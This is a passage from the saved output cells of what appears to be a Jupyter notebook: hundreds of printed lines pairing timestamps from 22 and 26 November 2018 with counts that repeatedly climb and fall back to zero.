"['2018-11-26 07:06:00', '6']\n",
"['2018-11-26 07:06:47', '7']\n",
"['2018-11-26 07:07:54', '9']\n",
"['2018-11-26 07:08:57', '9']\n",
"['2018-11-26 07:09:35', '9']\n",
"['2018-11-26 07:10:01', '9']\n",
"['2018-11-26 07:10:37', '0']\n",
"['2018-11-26 07:16:43', '0']\n",
"['2018-11-26 07:18:06', '0']\n",
"['2018-11-26 07:18:36', '0']\n",
"['2018-11-26 07:19:08', '0']\n",
"['2018-11-26 07:19:27', '0']\n",
"['2018-11-26 07:20:03', '0']\n",
"['2018-11-26 07:20:33', '0']\n",
"['2018-11-26 07:21:11', '0']\n",
"['2018-11-26 07:21:48', '0']\n",
"['2018-11-26 07:22:51', '0']\n",
"['2018-11-26 07:23:16', '0']\n",
"['2018-11-26 07:23:57', '0']\n",
"['2018-11-26 07:24:19', '0']\n",
"['2018-11-26 07:24:42', '0']\n",
"['2018-11-26 07:25:05', '0']\n",
"['2018-11-26 07:25:28', '0']\n",
"['2018-11-26 07:27:00', '0']\n",
"['2018-11-26 07:29:27', '0']\n",
"['2018-11-26 07:31:54', '0']\n",
"['2018-11-26 07:34:21', '0']\n",
"['2018-11-26 07:36:49', '1']\n",
"['2018-11-26 07:37:21', '1']\n",
"['2018-11-26 07:37:47', '0']\n",
"['2018-11-26 07:44:44', '1']\n",
"['2018-11-26 07:44:57', '1']\n",
"['2018-11-26 07:46:15', '1']\n",
"['2018-11-26 07:47:56', '1']\n",
"['2018-11-26 07:48:29', '2']\n",
"['2018-11-26 07:49:30', '2']\n",
"['2018-11-26 07:50:28', '2']\n",
"['2018-11-26 07:51:18', '7']\n",
"['2018-11-26 07:52:09', '8']\n",
"['2018-11-26 07:53:41', '8']\n",
"['2018-11-26 07:53:59', '8']\n",
"['2018-11-26 07:54:49', '8']\n",
"['2018-11-26 07:56:16', '8']\n",
"['2018-11-26 07:56:52', '6']\n",
"['2018-11-26 07:58:18', '6']\n",
"['2018-11-26 07:58:47', '9']\n",
"['2018-11-26 08:00:00', '9']\n",
"['2018-11-26 08:00:12', '10']\n",
"['2018-11-26 08:02:15', '0']\n",
"['2018-11-26 08:06:39', '15']\n",
"['2018-11-26 08:13:10', '14']\n",
"['2018-11-26 08:14:43', '11']\n",
"['2018-11-26 08:17:03', '11']\n",
"['2018-11-26 08:17:20', '12']\n",
"['2018-11-26 08:19:22', '11']\n",
"['2018-11-26 08:21:52', '11']\n",
"['2018-11-26 08:22:18', '10']\n",
"['2018-11-26 08:23:39', '9']\n",
"['2018-11-26 08:25:17', '6']\n",
"['2018-11-26 08:26:02', '2']\n",
"['2018-11-26 08:26:48', '2']\n",
"['2018-11-26 08:27:11', '2']\n",
"['2018-11-26 08:27:34', '2']\n",
"['2018-11-26 08:27:58', '2']\n",
"['2018-11-26 08:30:20', '2']\n",
"['2018-11-26 08:31:19', '1']\n",
"['2018-11-26 08:32:24', '3']\n",
"['2018-11-26 08:33:30', '4']\n",
"['2018-11-26 08:34:36', '5']\n",
"['2018-11-26 08:35:42', '5']\n",
"['2018-11-26 08:36:12', '6']\n",
"['2018-11-26 08:37:48', '0']\n",
"['2018-11-26 08:39:25', '18']\n",
"['2018-11-26 08:41:03', '30']\n",
"['2018-11-26 08:42:41', '31']\n",
"['2018-11-26 08:44:19', '32']\n",
"['2018-11-26 08:45:57', '39']\n",
"['2018-11-26 08:47:35', '41']\n",
"['2018-11-26 08:49:12', '43']\n",
"['2018-11-26 08:50:50', '47']\n",
"['2018-11-26 08:52:28', '53']\n",
"['2018-11-26 08:54:06', '38']\n",
"['2018-11-26 08:55:44', '42']\n",
"['2018-11-26 08:57:22', '45']\n",
"['2018-11-26 08:59:00', '46']\n",
"['2018-11-26 09:00:37', '45']\n",
"['2018-11-26 09:02:15', '29']\n",
"['2018-11-26 09:03:53', '18']\n",
"['2018-11-26 09:05:31', '17']\n",
"['2018-11-26 09:07:09', '17']\n",
"['2018-11-26 09:08:47', '0']\n",
"['2018-11-26 09:10:25', '41']\n",
"['2018-11-26 09:12:47', '45']\n",
"['2018-11-26 09:15:10', '44']\n",
"['2018-11-26 09:17:32', '39']\n",
"['2018-11-26 09:19:55', '36']\n",
"['2018-11-26 09:22:17', '26']\n",
"['2018-11-26 09:24:40', '17']\n",
"['2018-11-26 09:24:52', '2']\n",
"['2018-11-26 09:25:04', '2']\n",
"['2018-11-26 09:25:17', '3']\n",
"['2018-11-26 09:25:29', '2']\n",
"['2018-11-26 09:25:42', '1']\n",
"['2018-11-26 09:26:36', '1']\n",
"['2018-11-26 09:27:30', '1']\n",
"['2018-11-26 09:28:24', '1']\n",
"['2018-11-26 09:29:18', '1']\n",
"['2018-11-26 09:30:12', '0']\n",
"['2018-11-26 09:31:05', '0']\n",
"['2018-11-26 09:32:47', '0']\n",
"['2018-11-26 09:34:30', '0']\n",
"['2018-11-26 09:36:13', '0']\n",
"['2018-11-26 09:37:55', '0']\n",
"['2018-11-26 09:39:38', '0']\n",
"['2018-11-26 09:41:21', '4']\n",
"['2018-11-26 09:42:39', '5']\n",
"['2018-11-26 09:43:57', '5']\n",
"['2018-11-26 09:45:15', '5']\n",
"['2018-11-26 09:46:34', '8']\n",
"['2018-11-26 09:47:44', '8']\n",
"['2018-11-26 09:48:40', '11']\n",
"['2018-11-26 09:51:42', '19']\n",
"['2018-11-26 09:52:36', '23']\n",
"['2018-11-26 09:54:09', '31']\n",
"['2018-11-26 09:55:42', '33']\n",
"['2018-11-26 09:57:16', '36']\n",
"['2018-11-26 09:58:49', '36']\n",
"['2018-11-26 10:00:23', '30']\n",
"['2018-11-26 10:01:56', '27']\n",
"['2018-11-26 10:03:29', '29']\n",
"['2018-11-26 10:05:03', '26']\n",
"['2018-11-26 10:06:36', '26']\n",
"['2018-11-26 10:08:10', '0']\n",
"['2018-11-26 10:09:43', '63']\n",
"['2018-11-26 10:11:16', '64']\n",
"['2018-11-26 10:12:50', '59']\n",
"['2018-11-26 10:14:23', '57']\n",
"['2018-11-26 10:15:57', '57']\n",
"['2018-11-26 10:17:30', '42']\n",
"['2018-11-26 10:19:04', '36']\n",
"['2018-11-26 10:20:37', '23']\n",
"['2018-11-26 10:22:10', '17']\n",
"['2018-11-26 10:23:44', '13']\n",
"['2018-11-26 10:25:17', '6']\n",
"['2018-11-26 10:26:51', '2']\n",
"['2018-11-26 10:28:24', '2']\n",
"['2018-11-26 10:29:57', '2']\n",
"['2018-11-26 10:31:31', '2']\n",
"['2018-11-26 10:33:04', '2']\n",
"['2018-11-26 10:34:38', '2']\n",
"['2018-11-26 10:36:11', '2']\n",
"['2018-11-26 10:37:44', '2']\n",
"['2018-11-26 10:39:18', '2']\n",
"['2018-11-26 10:40:51', '2']\n",
"['2018-11-26 10:42:25', '2']\n",
"['2018-11-26 10:43:58', '0']\n",
"['2018-11-26 10:45:32', '5']\n",
"['2018-11-26 10:47:05', '8']\n",
"['2018-11-26 10:48:38', '8']\n",
"['2018-11-26 10:50:12', '8']\n",
"['2018-11-26 10:51:45', '9']\n",
"['2018-11-26 10:53:19', '9']\n",
"['2018-11-26 10:54:52', '9']\n",
"['2018-11-26 10:56:25', '15']\n",
"['2018-11-26 10:57:59', '15']\n",
"['2018-11-26 10:59:32', '15']\n",
"['2018-11-26 11:01:06', '15']\n",
"['2018-11-26 11:02:39', '15']\n",
"['2018-11-26 11:04:12', '14']\n",
"['2018-11-26 11:05:46', '8']\n",
"['2018-11-26 11:07:19', '4']\n",
"['2018-11-26 11:08:53', '4']\n",
"['2018-11-26 11:10:26', '3']\n",
"['2018-11-26 11:12:00', '3']\n",
"['2018-11-26 11:13:22', '0']\n",
"['2018-11-26 11:14:44', '38']\n",
"['2018-11-26 11:16:06', '36']\n",
"['2018-11-26 11:17:28', '38']\n",
"['2018-11-26 11:18:51', '34']\n",
"['2018-11-26 11:20:56', '28']\n",
"['2018-11-26 11:27:18', '15']\n",
"['2018-11-22 06:11:45', '1']\n",
"['2018-11-22 06:12:38', '5']\n",
"['2018-11-22 06:16:05', '5']\n",
"['2018-11-22 06:16:20', '5']\n",
"['2018-11-22 06:17:02', '7']\n",
"['2018-11-22 06:17:57', '9']\n",
"['2018-11-22 06:18:40', '10']\n",
"['2018-11-22 06:19:19', '10']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 06:19:28', '10']\n",
"['2018-11-22 06:20:01', '10']\n",
"['2018-11-22 06:20:29', '10']\n",
"['2018-11-22 06:20:50', '10']\n",
"['2018-11-22 06:21:24', '12']\n",
"['2018-11-22 06:22:10', '14']\n",
"['2018-11-22 06:23:28', '14']\n",
"['2018-11-22 06:23:53', '14']\n",
"['2018-11-22 06:24:01', '14']\n",
"['2018-11-22 06:25:07', '15']\n",
"['2018-11-22 06:25:56', '15']\n",
"['2018-11-22 06:28:14', '5']\n",
"['2018-11-22 06:29:30', '5']\n",
"['2018-11-22 06:29:56', '5']\n",
"['2018-11-22 06:30:24', '5']\n",
"['2018-11-22 06:31:09', '5']\n",
"['2018-11-22 06:32:22', '4']\n",
"['2018-11-22 06:33:38', '5']\n",
"['2018-11-22 06:34:55', '5']\n",
"['2018-11-22 06:35:16', '5']\n",
"['2018-11-22 06:35:29', '5']\n",
"['2018-11-22 06:41:52', '5']\n",
"['2018-11-22 06:42:13', '4']\n",
"['2018-11-22 06:42:46', '4']\n",
"['2018-11-22 06:43:17', '4']\n",
"['2018-11-22 06:43:36', '4']\n",
"['2018-11-22 06:43:58', '4']\n",
"['2018-11-22 06:44:28', '4']\n",
"['2018-11-22 06:45:01', '4']\n",
"['2018-11-22 06:45:27', '4']\n",
"['2018-11-22 06:45:39', '4']\n",
"['2018-11-22 06:46:33', '5']\n",
"['2018-11-22 06:47:39', '4']\n",
"['2018-11-22 06:48:24', '4']\n",
"['2018-11-22 06:48:42', '4']\n",
"['2018-11-22 06:49:29', '4']\n",
"['2018-11-22 06:49:58', '3']\n",
"['2018-11-22 06:50:36', '3']\n",
"['2018-11-22 06:51:05', '3']\n",
"['2018-11-22 06:51:29', '3']\n",
"['2018-11-22 06:51:49', '0']\n",
"['2018-11-22 06:52:58', '0']\n",
"['2018-11-22 06:53:34', '0']\n",
"['2018-11-22 06:53:58', '0']\n",
"['2018-11-22 06:54:28', '0']\n",
"['2018-11-22 06:54:54', '0']\n",
"['2018-11-22 06:55:13', '0']\n",
"['2018-11-22 06:55:40', '0']\n",
"['2018-11-22 06:56:02', '1']\n",
"['2018-11-22 06:58:27', '1']\n",
"['2018-11-22 06:58:40', '2']\n",
"['2018-11-22 06:59:41', '2']\n",
"['2018-11-22 07:00:13', '3']\n",
"['2018-11-22 07:00:52', '3']\n",
"['2018-11-22 07:01:06', '5']\n",
"['2018-11-22 07:01:58', '5']\n",
"['2018-11-22 07:02:16', '5']\n",
"['2018-11-22 07:02:53', '7']\n",
"['2018-11-22 07:03:50', '7']\n",
"['2018-11-22 07:04:13', '7']\n",
"['2018-11-22 07:04:34', '6']\n",
"['2018-11-22 07:04:39', '6']\n",
"['2018-11-22 07:06:34', '6']\n",
"['2018-11-22 07:06:52', '7']\n",
"['2018-11-22 07:08:40', '7']\n",
"['2018-11-22 07:08:56', '6']\n",
"['2018-11-22 07:09:28', '6']\n",
"['2018-11-22 07:09:39', '7']\n",
"['2018-11-22 07:12:34', '4']\n",
"['2018-11-22 07:15:31', '4']\n",
"['2018-11-22 07:16:16', '4']\n",
"['2018-11-22 07:16:47', '4']\n",
"['2018-11-22 07:17:47', '4']\n",
"['2018-11-22 07:18:02', '4']\n",
"['2018-11-22 07:18:30', '4']\n",
"['2018-11-22 07:19:16', '4']\n",
"['2018-11-22 07:21:07', '3']\n",
"['2018-11-22 07:21:42', '3']\n",
"['2018-11-22 07:21:59', '3']\n",
"['2018-11-22 07:22:50', '3']\n",
"['2018-11-22 07:23:16', '3']\n",
"['2018-11-22 07:23:46', '0']\n",
"['2018-11-22 07:24:39', '0']\n",
"['2018-11-22 07:25:14', '0']\n",
"['2018-11-22 07:25:23', '1']\n",
"['2018-11-22 07:29:19', '2']\n",
"['2018-11-22 07:30:34', '0']\n",
"['2018-11-22 07:41:00', '12']\n",
"['2018-11-22 07:41:59', '15']\n",
"['2018-11-22 07:45:04', '18']\n",
"['2018-11-22 07:46:01', '18']\n",
"['2018-11-22 07:46:57', '18']\n",
"['2018-11-22 07:47:11', '19']\n",
"['2018-11-22 07:47:55', '21']\n",
"['2018-11-22 07:48:54', '21']\n",
"['2018-11-22 07:49:13', '24']\n",
"['2018-11-22 07:50:22', '24']\n",
"['2018-11-22 07:50:41', '25']\n",
"['2018-11-22 07:51:24', '26']\n",
"['2018-11-22 07:52:23', '27']\n",
"['2018-11-22 07:53:15', '28']\n",
"['2018-11-22 07:54:55', '28']\n",
"['2018-11-22 07:55:20', '27']\n",
"['2018-11-22 07:56:03', '27']\n",
"['2018-11-22 07:57:12', '27']\n",
"['2018-11-22 07:57:57', '27']\n",
"['2018-11-22 08:02:38', '34']\n",
"['2018-11-22 08:05:09', '38']\n",
"['2018-11-22 08:06:08', '36']\n",
"['2018-11-22 08:09:32', '36']\n",
"['2018-11-22 08:09:58', '35']\n",
"['2018-11-22 08:11:49', '30']\n",
"['2018-11-22 08:13:25', '47']\n",
"['2018-11-22 08:16:20', '46']\n",
"['2018-11-22 08:17:17', '44']\n",
"['2018-11-22 08:17:28', '43']\n",
"['2018-11-22 08:19:03', '43']\n",
"['2018-11-22 08:19:24', '43']\n",
"['2018-11-22 08:20:51', '43']\n",
"['2018-11-22 08:21:58', '31']\n",
"['2018-11-22 08:22:48', '30']\n",
"['2018-11-22 08:23:27', '29']\n",
"['2018-11-22 08:24:27', '29']\n",
"['2018-11-22 08:24:54', '30']\n",
"['2018-11-22 08:25:48', '30']\n",
"['2018-11-22 08:26:28', '30']\n",
"['2018-11-22 08:28:11', '30']\n",
"['2018-11-22 08:28:57', '30']\n",
"['2018-11-22 08:29:52', '31']\n",
"['2018-11-22 08:30:39', '30']\n",
"['2018-11-22 08:31:26', '30']\n",
"['2018-11-22 08:32:05', '30']\n",
"['2018-11-22 08:32:41', '6']\n",
"['2018-11-22 08:34:02', '3']\n",
"['2018-11-22 08:34:27', '3']\n",
"['2018-11-22 08:34:46', '0']\n",
"['2018-11-22 08:35:55', '7']\n",
"['2018-11-22 08:37:05', '7']\n",
"['2018-11-22 08:38:15', '9']\n",
"['2018-11-22 08:39:25', '10']\n",
"['2018-11-22 08:40:35', '10']\n",
"['2018-11-22 08:41:44', '13']\n",
"['2018-11-22 08:42:54', '17']\n",
"['2018-11-22 08:44:04', '27']\n",
"['2018-11-22 08:45:14', '32']\n",
"['2018-11-22 08:46:24', '39']\n",
"['2018-11-22 08:47:33', '38']\n",
"['2018-11-22 08:48:43', '39']\n",
"['2018-11-22 08:49:53', '41']\n",
"['2018-11-22 08:51:03', '43']\n",
"['2018-11-22 08:52:13', '46']\n",
"['2018-11-22 08:53:22', '49']\n",
"['2018-11-22 08:54:32', '47']\n",
"['2018-11-22 08:55:42', '52']\n",
"['2018-11-22 08:56:52', '55']\n",
"['2018-11-22 08:58:02', '58']\n",
"['2018-11-22 08:59:11', '58']\n",
"['2018-11-22 09:00:21', '60']\n",
"['2018-11-22 09:01:31', '60']\n",
"['2018-11-22 09:02:41', '44']\n",
"['2018-11-22 09:03:51', '39']\n",
"['2018-11-22 09:05:00', '38']\n",
"['2018-11-22 09:06:10', '29']\n",
"['2018-11-22 09:07:20', '30']\n",
"['2018-11-22 09:08:30', '34']\n",
"['2018-11-22 09:09:40', '37']\n",
"['2018-11-22 09:10:49', '41']\n",
"['2018-11-22 09:11:59', '46']\n",
"['2018-11-22 09:13:09', '43']\n",
"['2018-11-22 09:14:19', '28']\n",
"['2018-11-22 09:15:29', '28']\n",
"['2018-11-22 09:16:38', '30']\n",
"['2018-11-22 09:17:48', '21']\n",
"['2018-11-22 09:18:58', '22']\n",
"['2018-11-22 09:20:08', '22']\n",
"['2018-11-22 09:21:18', '22']\n",
"['2018-11-22 09:22:27', '22']\n",
"['2018-11-22 09:23:37', '6']\n",
"['2018-11-22 09:24:47', '5']\n",
"['2018-11-22 09:25:57', '5']\n",
"['2018-11-22 09:27:07', '5']\n",
"['2018-11-22 09:28:16', '3']\n",
"['2018-11-22 09:29:26', '3']\n",
"['2018-11-22 09:30:36', '3']\n",
"['2018-11-22 09:31:46', '0']\n",
"['2018-11-22 09:32:56', '1']\n",
"['2018-11-22 09:33:35', '4']\n",
"['2018-11-22 09:33:56', '4']\n",
"['2018-11-22 09:34:52', '5']\n",
"['2018-11-22 09:36:37', '5']\n",
"['2018-11-22 09:37:11', '7']\n",
"['2018-11-22 09:38:25', '9']\n",
"['2018-11-22 09:38:38', '9']\n",
"['2018-11-22 09:39:28', '10']\n",
"['2018-11-22 09:40:01', '11']\n",
"['2018-11-22 09:41:04', '11']\n",
"['2018-11-22 09:41:44', '11']\n",
"['2018-11-22 09:42:07', '12']\n",
"['2018-11-22 09:42:54', '14']\n",
"['2018-11-22 09:43:51', '16']\n",
"['2018-11-22 09:45:14', '18']\n",
"['2018-11-22 09:46:42', '18']\n",
"['2018-11-22 09:47:12', '18']\n",
"['2018-11-22 09:47:26', '18']\n",
"['2018-11-22 09:48:56', '17']\n",
"['2018-11-22 09:49:46', '17']\n",
"['2018-11-22 09:56:55', '14']\n",
"['2018-11-22 09:59:23', '14']\n",
"['2018-11-22 10:01:45', '15']\n",
"['2018-11-22 10:03:25', '10']\n",
"['2018-11-22 10:05:09', '8']\n",
"['2018-11-22 10:09:04', '4']\n",
"['2018-11-22 10:10:40', '8']\n",
"['2018-11-22 10:13:21', '8']\n",
"['2018-11-22 10:14:07', '8']\n",
"['2018-11-22 10:14:15', '7']\n",
"['2018-11-22 10:15:45', '5']\n",
"['2018-11-22 10:17:27', '7']\n",
"['2018-11-22 10:18:48', '7']\n",
"['2018-11-22 10:19:24', '7']\n",
"['2018-11-22 10:19:40', '7']\n",
"['2018-11-22 10:20:01', '7']\n",
"['2018-11-22 10:20:30', '7']\n",
"['2018-11-22 10:21:05', '7']\n",
"['2018-11-22 10:21:31', '7']\n",
"['2018-11-22 10:21:48', '6']\n",
"['2018-11-22 10:24:28', '6']\n",
"['2018-11-22 10:26:46', '7']\n",
"['2018-11-22 10:27:34', '7']\n",
"['2018-11-22 10:29:20', '6']\n",
"['2018-11-22 10:31:06', '6']\n",
"['2018-11-22 10:32:53', '5']\n",
"['2018-11-22 10:34:39', '0']\n",
"['2018-11-22 10:36:26', '2']\n",
"['2018-11-22 10:37:18', '2']\n",
"['2018-11-22 10:39:21', '3']\n",
"['2018-11-22 10:43:16', '3']\n",
"['2018-11-22 10:44:19', '3']\n",
"['2018-11-22 10:44:45', '3']\n",
"['2018-11-22 10:45:31', '5']\n",
"['2018-11-22 10:46:20', '5']\n",
"['2018-11-22 10:46:36', '6']\n",
"['2018-11-22 10:47:30', '6']\n",
"['2018-11-22 10:47:40', '7']\n",
"['2018-11-22 10:49:50', '8']\n",
"['2018-11-22 10:50:57', '11']\n",
"['2018-11-22 10:52:10', '11']\n",
"['2018-11-22 10:53:19', '11']\n",
"['2018-11-22 10:53:26', '12']\n",
"['2018-11-22 10:56:52', '10']\n",
"['2018-11-22 10:58:17', '12']\n",
"['2018-11-22 11:01:22', '13']\n",
"['2018-11-22 11:03:02', '16']\n",
"['2018-11-22 11:05:27', '18']\n",
"['2018-11-22 11:06:15', '19']\n",
"['2018-11-22 11:11:04', '20']\n",
"['2018-11-22 11:13:54', '19']\n",
"['2018-11-22 11:14:38', '19']\n",
"['2018-11-22 11:14:52', '17']\n",
"['2018-11-22 11:17:10', '17']\n",
"['2018-11-22 11:17:26', '15']\n",
"['2018-11-22 11:18:26', '15']\n",
"['2018-11-22 11:19:23', '11']\n",
"['2018-11-22 11:20:34', '10']\n",
"['2018-11-22 11:21:32', '11']\n",
"['2018-11-22 11:22:22', '10']\n",
"['2018-11-22 11:23:54', '9']\n",
"['2018-11-22 11:25:04', '8']\n",
"['2018-11-22 11:26:00', '6']\n",
"['2018-11-22 11:27:33', '6']\n",
"['2018-11-22 11:28:03', '4']\n",
"['2018-11-22 11:28:53', '1']\n",
"['2018-11-22 11:30:46', '1']\n",
"['2018-11-22 11:31:27', '1']\n",
"['2018-11-22 11:32:08', '1']\n",
"['2018-11-22 11:32:34', '0']\n",
"['2018-11-22 11:36:20', '2']\n",
"['2018-11-22 11:36:59', '3']\n",
"['2018-11-22 11:37:54', '4']\n",
"['2018-11-22 11:39:04', '4']\n",
"['2018-11-22 11:41:23', '4']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 11:42:26', '4']\n",
"['2018-11-22 11:43:20', '4']\n",
"['2018-11-22 11:43:42', '7']\n",
"['2018-11-22 11:44:57', '7']\n",
"['2018-11-22 11:45:10', '9']\n",
"['2018-11-22 11:45:48', '9']\n",
"['2018-11-22 11:46:35', '9']\n",
"['2018-11-22 11:47:07', '9']\n",
"['2018-11-22 11:47:39', '9']\n",
"['2018-11-22 11:48:59', '11']\n",
"['2018-11-22 11:50:10', '11']\n",
"['2018-11-22 11:51:42', '11']\n",
"['2018-11-22 11:52:13', '12']\n",
"['2018-11-22 11:52:59', '13']\n",
"['2018-11-22 11:54:58', '13']\n",
"['2018-11-22 11:55:11', '12']\n",
"['2018-11-22 11:59:55', '13']\n",
"['2018-11-22 12:01:47', '17']\n",
"['2018-11-22 12:03:12', '16']\n",
"['2018-11-22 12:04:20', '8']\n",
"['2018-11-22 12:05:53', '10']\n",
"['2018-11-22 12:09:03', '19']\n",
"['2018-11-22 12:11:41', '26']\n",
"['2018-11-22 12:14:54', '28']\n",
"['2018-11-22 12:15:50', '29']\n",
"['2018-11-22 12:16:07', '26']\n",
"['2018-11-22 12:17:13', '22']\n",
"['2018-11-22 12:19:00', '22']\n",
"['2018-11-22 12:19:15', '21']\n",
"['2018-11-22 12:20:22', '17']\n",
"['2018-11-22 12:21:15', '14']\n",
"['2018-11-22 12:21:36', '14']\n",
"['2018-11-22 12:22:31', '13']\n",
"['2018-11-22 12:23:48', '11']\n",
"['2018-11-22 12:24:56', '11']\n",
"['2018-11-22 12:25:10', '11']\n",
"['2018-11-22 12:27:05', '8']\n",
"['2018-11-22 12:29:37', '6']\n",
"['2018-11-22 12:30:40', '6']\n",
"['2018-11-22 12:32:00', '4']\n",
"['2018-11-22 12:33:21', '2']\n",
"['2018-11-22 12:34:41', '2']\n",
"['2018-11-22 12:36:02', '0']\n",
"['2018-11-22 12:37:23', '6']\n",
"['2018-11-22 12:37:53', '9']\n",
"['2018-11-22 12:40:33', '9']\n",
"['2018-11-22 12:43:50', '9']\n",
"['2018-11-22 12:44:15', '9']\n",
"['2018-11-22 12:44:32', '10']\n",
"['2018-11-22 12:45:43', '10']\n",
"['2018-11-22 12:46:31', '10']\n",
"['2018-11-22 12:46:58', '10']\n",
"['2018-11-22 12:47:22', '12']\n",
"['2018-11-22 12:48:21', '12']\n",
"['2018-11-22 12:49:26', '16']\n",
"['2018-11-22 12:53:21', '17']\n",
"['2018-11-22 12:54:59', '19']\n",
"['2018-11-22 12:56:45', '19']\n",
"['2018-11-22 12:56:51', '20']\n",
"['2018-11-22 13:00:37', '24']\n",
"['2018-11-22 13:02:12', '30']\n",
"['2018-11-22 13:04:46', '33']\n",
"['2018-11-22 13:06:07', '36']\n",
"['2018-11-22 13:08:31', '32']\n",
"['2018-11-22 13:09:28', '34']\n",
"['2018-11-22 13:12:37', '24']\n",
"['2018-11-22 13:16:06', '25']\n",
"['2018-11-22 13:16:56', '26']\n",
"['2018-11-22 13:17:41', '27']\n",
"['2018-11-22 13:19:19', '25']\n",
"['2018-11-22 13:20:03', '23']\n",
"['2018-11-22 13:21:41', '23']\n",
"['2018-11-22 13:22:44', '17']\n",
"['2018-11-22 13:23:48', '14']\n",
"['2018-11-22 13:24:37', '11']\n",
"['2018-11-22 13:25:15', '10']\n",
"['2018-11-22 13:26:24', '8']\n",
"['2018-11-22 13:27:44', '5']\n",
"['2018-11-22 13:28:33', '3']\n",
"['2018-11-22 13:30:03', '3']\n",
"['2018-11-22 13:30:26', '3']\n",
"['2018-11-22 13:31:54', '3']\n",
"['2018-11-22 13:32:17', '4']\n",
"['2018-11-22 13:33:19', '4']\n",
"['2018-11-22 13:33:53', '4']\n",
"['2018-11-22 13:34:14', '0']\n",
"['2018-11-22 13:36:18', '0']\n",
"['2018-11-22 13:36:57', '0']\n",
"['2018-11-22 13:37:22', '0']\n",
"['2018-11-22 13:38:29', '0']\n",
"['2018-11-22 13:38:59', '0']\n",
"['2018-11-22 13:39:42', '0']\n",
"['2018-11-22 13:40:36', '0']\n",
"['2018-11-22 13:40:46', '1']\n",
"['2018-11-22 13:41:39', '1']\n",
"['2018-11-22 13:42:09', '1']\n",
"['2018-11-22 13:42:15', '3']\n",
"['2018-11-22 13:43:22', '4']\n",
"['2018-11-22 13:44:21', '4']\n",
"['2018-11-22 13:44:46', '4']\n",
"['2018-11-22 13:45:31', '4']\n",
"['2018-11-22 13:46:24', '5']\n",
"['2018-11-22 13:47:49', '5']\n",
"['2018-11-22 13:48:19', '5']\n",
"['2018-11-22 13:48:29', '5']\n",
"['2018-11-22 13:49:32', '6']\n",
"['2018-11-22 13:50:18', '9']\n",
"['2018-11-22 13:57:28', '11']\n",
"['2018-11-22 13:59:24', '11']\n",
"['2018-11-22 14:00:19', '12']\n",
"['2018-11-22 14:02:30', '12']\n",
"['2018-11-22 14:02:45', '11']\n",
"['2018-11-22 14:04:44', '13']\n",
"['2018-11-22 14:06:42', '13']\n",
"['2018-11-22 14:09:46', '10']\n",
"['2018-11-22 14:10:33', '9']\n",
"['2018-11-22 14:10:41', '10']\n",
"['2018-11-22 14:11:34', '9']\n",
"['2018-11-22 14:16:28', '9']\n",
"['2018-11-22 14:16:41', '9']\n",
"['2018-11-22 14:17:09', '10']\n",
"['2018-11-22 14:18:00', '10']\n",
"['2018-11-22 14:18:21', '7']\n",
"['2018-11-22 14:19:12', '5']\n",
"['2018-11-22 14:20:38', '5']\n",
"['2018-11-22 14:21:04', '5']\n",
"['2018-11-22 14:21:17', '5']\n",
"['2018-11-22 14:22:42', '4']\n",
"['2018-11-22 14:25:11', '2']\n",
"['2018-11-22 14:26:10', '2']\n",
"['2018-11-22 14:28:20', '2']\n",
"['2018-11-22 14:30:31', '2']\n",
"['2018-11-22 14:32:41', '1']\n",
"['2018-11-22 14:34:52', '0']\n",
"['2018-11-22 14:37:03', '1']\n",
"['2018-11-22 14:37:30', '7']\n",
"['2018-11-22 14:39:36', '8']\n",
"['2018-11-22 14:42:35', '13']\n",
"['2018-11-22 14:43:17', '17']\n",
"['2018-11-22 14:44:07', '16']\n",
"['2018-11-22 14:45:46', '16']\n",
"['2018-11-22 14:45:52', '17']\n",
"['2018-11-22 14:46:35', '18']\n",
"['2018-11-22 14:47:24', '20']\n",
"['2018-11-22 14:48:10', '20']\n",
"['2018-11-22 14:49:44', '20']\n",
"['2018-11-22 14:50:55', '20']\n",
"['2018-11-22 14:51:16', '21']\n",
"['2018-11-22 14:52:05', '19']\n",
"['2018-11-22 14:53:13', '21']\n",
"['2018-11-22 14:56:43', '24']\n",
"['2018-11-22 14:58:10', '29']\n",
"['2018-11-22 15:00:30', '26']\n",
"['2018-11-22 15:02:29', '26']\n",
"['2018-11-22 15:03:34', '24']\n",
"['2018-11-22 15:04:20', '26']\n",
"['2018-11-22 15:06:35', '18']\n",
"['2018-11-22 15:08:49', '18']\n",
"['2018-11-22 15:09:12', '19']\n",
"['2018-11-22 15:09:57', '21']\n",
"['2018-11-22 15:13:12', '21']\n",
"['2018-11-22 15:14:06', '36']\n",
"['2018-11-22 15:15:26', '36']\n",
"['2018-11-22 15:16:24', '30']\n",
"['2018-11-22 15:17:17', '31']\n",
"['2018-11-22 15:18:10', '23']\n",
"['2018-11-22 15:18:53', '21']\n",
"['2018-11-22 15:20:01', '20']\n",
"['2018-11-22 15:21:40', '20']\n",
"['2018-11-22 15:22:06', '13']\n",
"['2018-11-22 15:23:14', '6']\n",
"['2018-11-22 15:24:23', '6']\n",
"['2018-11-22 15:24:51', '6']\n",
"['2018-11-22 15:26:46', '6']\n",
"['2018-11-22 15:27:15', '4']\n",
"['2018-11-22 15:28:10', '3']\n",
"['2018-11-22 15:28:53', '0']\n",
"['2018-11-22 15:38:17', '2']\n",
"['2018-11-22 15:38:49', '3']\n",
"['2018-11-22 15:39:39', '5']\n",
"['2018-11-22 15:40:38', '5']\n",
"['2018-11-22 15:41:05', '5']\n",
"['2018-11-22 15:41:43', '7']\n",
"['2018-11-22 15:42:32', '10']\n",
"['2018-11-22 15:42:43', '11']\n",
"['2018-11-22 15:43:27', '11']\n",
"['2018-11-22 15:44:11', '11']\n",
"['2018-11-22 15:44:16', '11']\n",
"['2018-11-22 15:45:21', '11']\n",
"['2018-11-22 15:45:39', '11']\n",
"['2018-11-22 15:46:25', '12']\n",
"['2018-11-22 15:47:17', '16']\n",
"['2018-11-22 15:48:03', '17']\n",
"['2018-11-22 15:49:24', '17']\n",
"['2018-11-22 15:49:50', '17']\n",
"['2018-11-22 15:49:55', '19']\n",
"['2018-11-22 15:51:20', '19']\n",
"['2018-11-22 15:52:02', '19']\n",
"['2018-11-22 15:55:17', '21']\n",
"['2018-11-22 15:58:08', '21']\n",
"['2018-11-22 15:59:04', '26']\n",
"['2018-11-22 16:01:02', '22']\n",
"['2018-11-22 16:01:52', '25']\n",
"['2018-11-22 16:04:17', '25']\n",
"['2018-11-22 16:05:52', '24']\n",
"['2018-11-22 16:08:25', '24']\n",
"['2018-11-22 16:08:57', '24']\n",
"['2018-11-22 16:09:10', '22']\n",
"['2018-11-22 16:10:26', '21']\n",
